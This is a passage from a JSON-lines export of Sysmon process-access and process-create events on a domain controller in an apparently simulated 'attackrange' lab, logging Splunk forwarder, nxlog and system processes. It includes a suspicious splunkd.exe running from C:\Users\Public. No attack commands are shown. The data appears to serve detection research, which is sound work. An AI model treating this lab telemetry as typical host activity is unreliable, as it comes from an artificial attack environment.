06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1149-5F25-0000-001049110600}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.173","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1149-5F25-0000-001049110600}","TargetProcessId":"1172","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.298\r\nSourceProcessGUID: {E2A3D6B1-1149-5F25-0000-001049110600}\r\nSourceProcessId: 1172\r\nSourceThreadId: 2320\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.298","SourceProcessGUID":"{E2A3D6B1-1149-5F25-0000-001049110600}","SourceProcessId":"1172","SourceThreadId":"2320","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.486\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.486","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nProcessGuid: {E2A3D6B1-1149-5F25-0000-001014130600}\r\nProcessId: 3476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","ProcessGuid":"{E2A3D6B1-1149-5F25-0000-001014130600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1149-5F25-0000-001014130600}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1149-5F25-0000-001014130600}","TargetProcessId":"3476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1149-5F25-0000-001014130600}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1149-5F25-0000-001014130600}","TargetProcessId":"3476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 